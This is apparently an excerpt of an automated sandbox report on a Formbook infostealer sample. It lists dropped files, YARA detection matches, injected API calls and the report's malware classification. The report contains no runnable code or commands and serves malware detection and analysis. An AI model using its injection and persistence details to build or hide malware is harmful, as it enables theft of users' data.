          Source: C:\Windows\SysWOW64\cmd.exeDropped file: C:\Users\user\AppData\Roaming\75841791\758logri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\cmd.exeDropped file: C:\Users\user\AppData\Roaming\75841791\758logrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.723374268.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.723374268.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000008.00000002.724195917.0000000000D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000008.00000002.724195917.0000000000D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.248756113.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.248756113.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.249334557.00000000032F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.249334557.00000000032F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.249408055.0000000003320000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.249408055.0000000003320000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419CA0 NtCreateFile,2_2_00419CA0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419D50 NtReadFile,2_2_00419D50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419DD0 NtClose,2_2_00419DD0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419C9A NtCreateFile,2_2_00419C9A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419D4A NtReadFile,2_2_00419D4A
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00419DCA NtClose,2_2_00419DCA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499540 NtReadFile,LdrInitializeThunk,2_2_05499540
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_054995D0 NtClose,LdrInitializeThunk,2_2_054995D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499710 NtQueryInformationToken,LdrInitializeThunk,2_2_05499710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499780 NtMapViewOfSection,LdrInitializeThunk,2_2_05499780
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_054997A0 NtUnmapViewOfSection,LdrInitializeThunk,2_2_054997A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_054996E0 NtFreeVirtualMemory,LdrInitializeThunk,2_2_054996E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499910 NtAdjustPrivilegesToken,LdrInitializeThunk,2_2_05499910
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_054999A0 NtCreateSection,LdrInitializeThunk,2_2_054999A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499840 NtDelayExecution,LdrInitializeThunk,2_2_05499840
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499860 NtQuerySystemInformation,LdrInitializeThunk,2_2_05499860
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499A50 NtCreateFile,LdrInitializeThunk,2_2_05499A50
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499A20 NtResumeThread,LdrInitializeThunk,2_2_05499A20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499560 NtWriteFile,2_2_05499560
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499520 NtWaitForSingleObject,2_2_05499520
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0549AD30 NtSetContextThread,2_2_0549AD30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_054995F0 NtQueryInformationFile,2_2_054995F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499760 NtOpenProcess,2_2_05499760
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499770 NtSetInformationFile,2_2_05499770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0549A770 NtOpenThread,2_2_0549A770
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0549A710 NtOpenProcessToken,2_2_0549A710
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499730 NtQueryVirtualMemory,2_2_05499730
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499FE0 NtCreateMutant,2_2_05499FE0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499650 NtQueryValueKey,2_2_05499650
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499660 NtAllocateVirtualMemory,2_2_05499660
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499670 NtQueryInformationProcess,2_2_05499670
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499610 NtEnumerateValueKey,2_2_05499610
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_054996D0 NtCreateKey,2_2_054996D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499950 NtQueueApcThread,2_2_05499950
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_054999D0 NtCreateProcessEx,2_2_054999D0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0549B040 NtSuspendThread,2_2_0549B040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499820 NtEnumerateKey,2_2_05499820
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_054998F0 NtReadVirtualMemory,2_2_054998F0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_054998A0 NtWriteVirtualMemory,2_2_054998A0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499B00 NtSetValueKey,2_2_05499B00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0549A3B0 NtGetContextThread,2_2_0549A3B0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499A00 NtProtectVirtualMemory,2_2_05499A00
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499A10 NtQuerySection,2_2_05499A10
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05499A80 NtOpenDirectoryObject,2_2_05499A80
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00DA54E0 NtDelayExecution,2_2_00DA54E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00DA318C NtWriteVirtualMemory,2_2_00DA318C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011E6D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,8_2_011E6D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011EB5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,8_2_011EB5E0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011CB42E NtOpenThreadToken,NtOpenProcessToken,NtClose,8_2_011CB42E
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011C84BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,8_2_011C84BE
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011C58A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,8_2_011C58A4
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011CB4C0 NtQueryInformationToken,8_2_011CB4C0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011CB4F8 NtQueryInformationToken,NtQueryInformationToken,8_2_011CB4F8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011C83F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,8_2_011C83F2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011E9AB4 NtSetInformationFile,8_2_011E9AB4
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E3B4F8 NtQueryInformationToken,NtQueryInformationToken,24_2_00E3B4F8
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E3B4C0 NtQueryInformationToken,24_2_00E3B4C0
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E3B42E NtOpenThreadToken,NtOpenProcessToken,NtClose,24_2_00E3B42E
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E358A4 _setjmp3,NtQueryInformationProcess,NtSetInformationProcess,NtSetInformationProcess,longjmp,24_2_00E358A4
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E384BE NtQueryVolumeInformationFile,GetFileInformationByHandleEx,24_2_00E384BE
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E5B5E0 SetLastError,CreateDirectoryW,CreateFileW,RtlDosPathNameToNtPathName_U,memset,memcpy,memcpy,NtFsControlFile,RtlNtStatusToDosError,SetLastError,CloseHandle,RtlFreeHeap,RemoveDirectoryW,24_2_00E5B5E0
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E56D90 EnterCriticalSection,LeaveCriticalSection,fprintf,fflush,TryAcquireSRWLockExclusive,NtCancelSynchronousIoFile,ReleaseSRWLockExclusive,_get_osfhandle,FlushConsoleInputBuffer,24_2_00E56D90
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E59AB4 NtSetInformationFile,24_2_00E59AB4
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E383F2 RtlDosPathNameToRelativeNtPathName_U_WithStatus,NtOpenFile,RtlReleaseRelativeName,RtlFreeUnicodeString,CloseHandle,DeleteFileW,GetLastError,24_2_00E383F2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011D6550: memset,GetFileSecurityW,GetSecurityDescriptorOwner,??_V@YAXPAX@Z,memset,CreateFileW,DeviceIoControl,memcpy,CloseHandle,??_V@YAXPAX@Z,memset,??_V@YAXPAX@Z,FindClose,??_V@YAXPAX@Z,8_2_011D6550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011D374E InitializeProcThreadAttributeList,UpdateProcThreadAttribute,memset,memset,GetStartupInfoW,lstrcmpW,CreateProcessW,CloseHandle,GetLastError,GetLastError,DeleteProcThreadAttributeList,_local_unwind4,CreateProcessAsUserW,GetLastError,CloseHandle,8_2_011D374E
          Source: C:\Users\user\Desktop\111.exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9
          Source: C:\Users\user\Desktop\111.exeCode function: 0_2_004069430_2_00406943
          Source: C:\Users\user\Desktop\111.exeCode function: 0_2_0040711A0_2_0040711A
          Source: C:\Windows\SysWOW64\rundll32.exeCode function: 1_2_1000406B1_2_1000406B
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_004010302_2_00401030
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041E4F22_2_0041E4F2
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402D902_2_00402D90
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402D942_2_00402D94
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041D64C2_2_0041D64C
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00409E202_2_00409E20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041CEE32_2_0041CEE3
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041CEE62_2_0041CEE6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041E7532_2_0041E753
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0041DF632_2_0041DF63
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_00402FB02_2_00402FB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05521D552_2_05521D55
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05450D202_2_05450D20
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_05476E302_2_05476E30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0545F9002_2_0545F900
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_054741202_2_05474120
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_055110022_2_05511002
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0546B0902_2_0546B090
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 2_2_0548EBB02_2_0548EBB0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011E35068_2_011E3506
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011D65508_2_011D6550
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011D19698_2_011D1969
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011C71908_2_011C7190
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011E31DC8_2_011E31DC
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011CD8038_2_011CD803
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011CE0408_2_011CE040
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011C9CF08_2_011C9CF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011E5CEA8_2_011E5CEA
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011C48E68_2_011C48E6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011CCB488_2_011CCB48
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011D5FC88_2_011D5FC8
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011E6FF08_2_011E6FF0
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011CFA308_2_011CFA30
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011C52268_2_011C5226
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011C5E708_2_011C5E70
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011C8AD78_2_011C8AD7
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E5350624_2_00E53506
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E3FA3024_2_00E3FA30
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E56FF024_2_00E56FF0
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E348E624_2_00E348E6
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E55CEA24_2_00E55CEA
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E39CF024_2_00E39CF0
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E3E04024_2_00E3E040
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E3D80324_2_00E3D803
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E531DC24_2_00E531DC
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E3719024_2_00E37190
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E4196924_2_00E41969
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E4655024_2_00E46550
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E38AD724_2_00E38AD7
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E35E7024_2_00E35E70
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E3522624_2_00E35226
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E45FC824_2_00E45FC8
          Source: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exeCode function: 24_2_00E3CB4824_2_00E3CB48
          Source: Joe Sandbox ViewDropped File: C:\Program Files (x86)\C2dlxv4\t4nhyl7po.exe 3685495D051137B1C4EFDE22C26DF0883614B6453B762FA84588DA55ED2E7744
          Source: Joe Sandbox ViewDropped File: C:\Users\user\AppData\Local\Temp\C2dlxv4\t4nhyl7po.exe 3685495D051137B1C4EFDE22C26DF0883614B6453B762FA84588DA55ED2E7744
          Source: 111.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: 111.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: t4nhyl7po.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: t4nhyl7po.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: t4nhyl7po.exe.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: t4nhyl7po.exe0.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: t4nhyl7po.exe0.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: t4nhyl7po.exe0.3.drStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
          Source: msenc71ui.dll.0.drStatic PE information: No import functions for PE file found
          Source: C:\Windows\SysWOW64\rundll32.exeSection loaded: sfc.dllJump to behavior
          Source: 00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.724934710.0000000000E70000.00000004.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.723374268.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.723374268.0000000000990000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000008.00000002.724195917.0000000000D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000008.00000002.724195917.0000000000D40000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.248756113.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.248756113.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.249334557.00000000032F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.249334557.00000000032F0000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 00000002.00000002.249408055.0000000003320000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 00000002.00000002.249408055.0000000003320000.00000040.00000001.sdmp, type: MEMORYMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmd.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook_1 date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE
          Source: 2.2.cmd.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Formbook author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research
          Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@13/39@13/6
          Source: C:\Windows\SysWOW64\cmd.exeCode function: 8_2_011CC5CA _get_osfhandle,GetConsoleScreenBufferInfo,WriteConsoleW,GetLastError,GetLastError,FormatMessageW,GetConsoleScreenBufferInfo,WriteConsoleW,GetStdHandle,FlushConsoleInputBuffer,GetConsoleMode,SetConsoleMode,_getch,SetConsoleMode,GetConsoleScreenBufferInfo,FillConsoleOutputCharacterW,SetConsoleCursorPosition,EnterCriticalSection,LeaveCriticalSection,exit,8_2_011CC5CA
          Source: C:\Users\user\Desktop\111.exeCode function: 0_2_004033A9 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoA,GetCommandLineA,CharNextA,GetTempPathA,GetTempPathA,GetWindowsDirectoryA,lstrcatA,GetTempPathA,lstrcatA,SetEnvironmentVariableA,SetEnvironmentVariableA,SetEnvironmentVariableA,DeleteFileA,ExitProcess,OleUninitialize,ExitProcess,lstrcatA,lstrcatA,lstrcatA,lstrcmpiA,SetCurrentDirectoryA,DeleteFileA,CopyFileA,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,0_2_004033A9
          Source: C:\Users\user\Desktop\111.exeCode function: 0_2_00404686 GetDlgItem,SetWindowTextA,SHBrowseForFolderA,CoTaskMemFree,lstrcmpiA,lstrcatA,SetDlgItemTextA,GetDiskFreeSpaceA,MulDiv,SetDlgItemTextA,0_2_00404686
          Source: C:\Users\user\Desktop\111.exeCode function: 0_2_00402138 CoCreateInstance,MultiByteToWideChar,0_2_00402138
          Source: C:\Windows\explorer.exeFile created: C:\Program Files (x86)\C2dlxv4Jump to behavior
          Source: C:\Users\user\Desktop\111.exeFile created: C:\Users\user\AppData\Roaming\bookingJump to behavior
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5664:120:WilError_01
          Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1344:120:WilError_01
          Source: C:\Users\user\Desktop\111.exeFile created: C:\Users\user\AppData\Local\Temp\nswBDB8.tmpJump to behavior
          Source: 111.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
          Source: C:\Users\user\Desktop\111.exeFile read: C:\Users\desktop.ini